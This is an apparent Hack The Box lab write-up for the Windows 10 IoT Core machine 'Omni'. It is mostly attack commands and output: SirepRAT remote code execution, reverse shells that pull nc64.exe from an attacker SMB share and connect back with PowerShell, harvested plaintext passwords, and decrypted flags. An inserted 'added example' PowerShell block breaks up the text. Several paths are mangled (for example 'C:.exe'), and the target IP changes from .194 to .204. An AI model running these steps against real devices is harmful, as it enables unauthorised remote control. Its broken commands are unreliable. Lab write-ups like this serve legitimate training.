USER
root@nidus:/git/htb# nmap -Pn -sC -sV -n 10.10.10.194
PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
5985/tcp  open  wsman
8080/tcp  open  upnp    Microsoft IIS httpd
| http-auth:
| HTTP/1.1 401 Unauthorized
|_  Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
29817/tcp open  unknown
29819/tcp open  unknown
29820/tcp open  unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Visiting port 8080 we are met with a login prompt for "Windows Device Portal". Googling it, the default credentials are Administrator:p@ssw0rd, but they do not work here. Reading further tells us the portal belongs to Windows 10 IoT Core, running on a Raspberry Pi.
There are known vulnerabilities and exploits for Windows 10 IoT Core; one of them is SirepRAT, which gives an attacker unauthenticated RCE. The In-Depth paper on IoT Core (linked below) contains a lot of useful information about the web server, how to change the Administrator password, and so on.
Download SirepRAT and start poking the target to verify code execution. I tried to change the Administrator password but got "Access is denied", which still confirms RCE.
root@nidus:/git/htb/omni/SirepRAT# python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "C:.exe" --args " /c net user Administrator 123Abc!"
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
<OutputStreamResult | type: 11, payload length: 53, payload peek: 'System error 5 has occurred.Access is denied.'>
Next, get a reverse shell. The easiest way in my opinion is to run nc64.exe from your own SMB share to trigger a shell.
root@nidus:/git/htb/omni/SirepRAT# python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "C:.exe" --args " /c //10.10.14.4/pub-share/nc64.exe 10.10.14.4 4488 -e powershell"
root@nidus:~# rlwrap nc -lvnp 4488
listening on [any] 4488 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.204] 49672
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:>
Enumerating the box, we instantly notice that "whoami" doesn't work, nor are there any valid users in C:. We can confirm the current user by running "$env:UserName", which gives us DefaultAccount.
PS C:> $env:UserName
$env:UserName
DefaultAccount
PS C:> Get-PSDrive
Get-PSDrive
Name     Used (GB) Free (GB) Provider    Root
----     --------- --------- --------    ----
Alias                        Alias
C             1.04      0.54 FileSystem  C:\
Cert                         Certificate \
D                            FileSystem  D:\
Env                          Environment
Function                     Function
HKCU                         Registry    HKEY_CURRENT_USER
HKLM                         Registry    HKEY_LOCAL_MACHINE
U             0.51      4.37 FileSystem  U:\
Variable                     Variable
WSMan                        WSMan
With further enumeration we find Users directories on both C: and U:, but none of them contain any relevant information. I got stuck here for a good while and started looking back at previous boxes, and found that on Resolute (also created by egre55) there was a hidden file containing valuable data.
So I started looking in every directory for hidden files, and voilà!
PS C:Files> get-childitem -Path [rs]* -Force
get-childitem -Path [rs]* -Force
    Directory: C:Files
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a-h--         8/21/2020  12:56 PM            247 r.bat
PS C:Files> type r.bat
type r.bat
@echo off
:LOOP
for /F "skip=6" %%i in ('net localgroup "administrators"') do net localgroup "administrators" %%i /delete
net user app mesh5143
net user administrator _1nt3rn37ofTh1nGz
ping -n 3 127.0.0.1
cls
GOTO :LOOP
:EXIT
Change user from DefaultAccount to Administrator and look for user.txt and root.txt.
PS C:> $env:UserName
DefaultAccount
PS C:> $env:computername
omni
PS C:> $user = 'omni'
PS C:> $pass = '_1nt3rn37ofTh1nGz' | ConvertTo-SecureString -AsPlainText -Force
PS C:> $creds = New-Object System.Management.Automation.PSCredential($user,$pass)
PS C:> Invoke-Command -ComputerName localhost -Credential $creds -ScriptBlock { $env:UserName }
Administrator
PS C:Files> Invoke-Command -ComputerName localhost -Credential $creds -ScriptBlock { //10.10.14.4/pub-share/nc64.exe 10.10.14.4 4499 -e powershell }
root@nidus:/git/htb/omni# rlwrap nc -lvnp 4499
listening on [any] 4499 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.204] 49679
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Data\Users\administrator\Documents> $env:UserName
Administrator
Looking at root.txt we can see that it's somehow encrypted, and the same goes for user.txt.
PS C:> type root.txt
flag
PS C:> type user.txt
flag
Looking for ways to decrypt this, I googled 'powershell password decrypt' and found a Microsoft DevBlog covering the subject. However, following the blog post to decrypt the files doesn't work. Both root.txt and user.txt give the same error: "Import-CliXml : Error occurred during a cryptographic operation."
PS C:> $Credz = Import-CliXml -Path C:.txt
$Credz = Import-CliXml -Path C:.txt
Import-CliXml : Error occurred during a cryptographic operation.
At line:1 char:10
+ $Credz = Import-CliXml -Path C:.txt
+          ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Import-Clixml], CryptographicException
    + FullyQualifiedErrorId : System.Security.Cryptography.CryptographicException,Microsoft.PowerShell.Commands.ImportClixmlCommand
PS C:> $Credz = Import-CliXml -Path C:.txt
$Credz = Import-CliXml -Path C:.txt
Import-CliXml : Error occurred during a cryptographic operation.
At line:1 char:10
+ $Credz = Import-CliXml -Path C:.txt
+          ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Import-Clixml], CryptographicException
    + FullyQualifiedErrorId : System.Security.Cryptography.CryptographicException,Microsoft.PowerShell.Commands.ImportClixmlCommand
Googling this error suggests the issue is a missing machine key in web.config, exact quote: “For anyone who hasn't solved their problem, I was missing the "machineKey" entry for encrypt/decrypt in my web.config”
So, web.config. Let's try to approach this from the web app on port 8080 instead: log in with app:mesh5143, press 'Processes' > 'Run Command' and get a reverse shell from your local SMB share:
//10.10.14.4/pub-share/nc64.exe 10.10.14.4 4499 -e powershell
root@nidus:/git/htb/omni# rlwrap nc -lvnp 4499
listening on [any] 4499 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.204] 49705
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:> $env:UserName
app
PS C:> $Credz = Import-CliXml -Path C:.txt
PS C:> $Credz.GetNetworkCredential().Password
7cfd50f6bc34db3204898f1505ad9d70
Finally, we have user.txt.
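The reason the same Import-CliXml call fails in one shell and works in another is worth seeing end to end. This is an added example, not code from the writeup: Export-CliXml stores a PSCredential's password as a SecureString that ConvertFrom-SecureString protects with DPAPI in CurrentUser scope, so only the account that wrote the file (on that machine) can read it back. The $demo path, the 'constructed-sample-flag' value and the $other credentials are placeholders; the Invoke-Command part assumes WinRM on localhost, as on the box.

```powershell
# Added example (not from the original writeup). Shows how a file like user.txt is
# produced with Export-CliXml and why Import-CliXml only succeeds for the account
# that created it: the password is a DPAPI (CurrentUser) protected SecureString.

function New-ProtectedFlagFile {
    param([string]$Path, [string]$Secret)
    $ss   = ConvertTo-SecureString -String $Secret -AsPlainText -Force
    $cred = New-Object System.Management.Automation.PSCredential('flag', $ss)
    $cred | Export-CliXml -Path $Path
}

function Read-ProtectedFlagFile {
    # Returns the plaintext, or the cryptographic error text when the file was
    # written by a different account than the one doing the import.
    param([string]$Path, [pscredential]$RunAs)
    $sb = { param($p) (Import-CliXml -Path $p).GetNetworkCredential().Password }
    try {
        if ($RunAs) {
            # Same mechanism the writeup uses: WinRM to localhost under other credentials.
            Invoke-Command -ComputerName localhost -Credential $RunAs -ScriptBlock $sb -ArgumentList $Path
        } else {
            & $sb $Path
        }
    } catch {
        "FAILED: $($_.Exception.Message)"
    }
}

# Constructed sample; $demo is a hypothetical path standing in for the box's user.txt.
$demo = Join-Path $env:TEMP 'demo-user.txt'
New-ProtectedFlagFile -Path $demo -Secret 'constructed-sample-flag'

# On disk the password is an opaque hex blob inside <SS N="Password">...</SS>, not plaintext.
if ((Get-Content $demo -Raw) -match '<SS N="Password">([0-9a-f]{20})') {
    "stored as: $($Matches[1])..."
}

# Same account that wrote the file: decrypts.
Read-ProtectedFlagFile -Path $demo

# Any other local account (placeholder credentials): fails with
# "Error occurred during a cryptographic operation.", exactly the error seen on the box.
$other = Get-Credential -Message 'some other local account (placeholder)'
Read-ProtectedFlagFile -Path $demo -RunAs $other
```

Because no -Key was given to ConvertFrom-SecureString, the blob is bound to the writing account rather than to a shared key, which is why a shell running as app (and later as Administrator) is needed rather than any shell on the host.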
ROOT
As we already have the credentials for Administrator, log in again on port 8080 (administrator:_1nt3rn37ofTh1nGz) and repeat the process to grab root.txt.
Press 'Processes' > 'Run Command' and get a reverse shell from your local SMB share:
//10.10.14.4/pub-share/nc64.exe 10.10.14.4 4499 -e powershell
root@nidus:/git/htb/omni# rlwrap nc -lvnp 4499
listening on [any] 4499 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.204] 49705
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\windows\system32> $env:UserName
Administrator
PS C:\windows\system32> $Credz = Import-CliXml -Path C:\Data\Users\administrator\root.txt
PS C:\windows\system32> $Credz.GetNetworkCredential().Password
5dbdce5569e2c4708617c0ce6e9bf11d
INFORMATION
In-Depth of IoT Core https://www.blackhat.com/docs/us-16/materials/us-16-Sabanal-Into-The-Core-In-Depth-Exploration-Of-Windows-10-IoT-Core-wp.pdf
Exploit IoT Core https://www.zdnet.com/article/new-exploit-lets-attackers-take-control-of-windows-iot-core-devices/
SirepRAT https://github.com/SafeBreach-Labs/SirepRAT
Decrypt PowerShell https://devblogs.microsoft.com/scripting/decrypt-powershell-secure-string-password/
Decrypt Error https://stackoverflow.com/questions/25857577/error-occurred-during-a-cryptographic-operation-when-decrypting-forms-cookie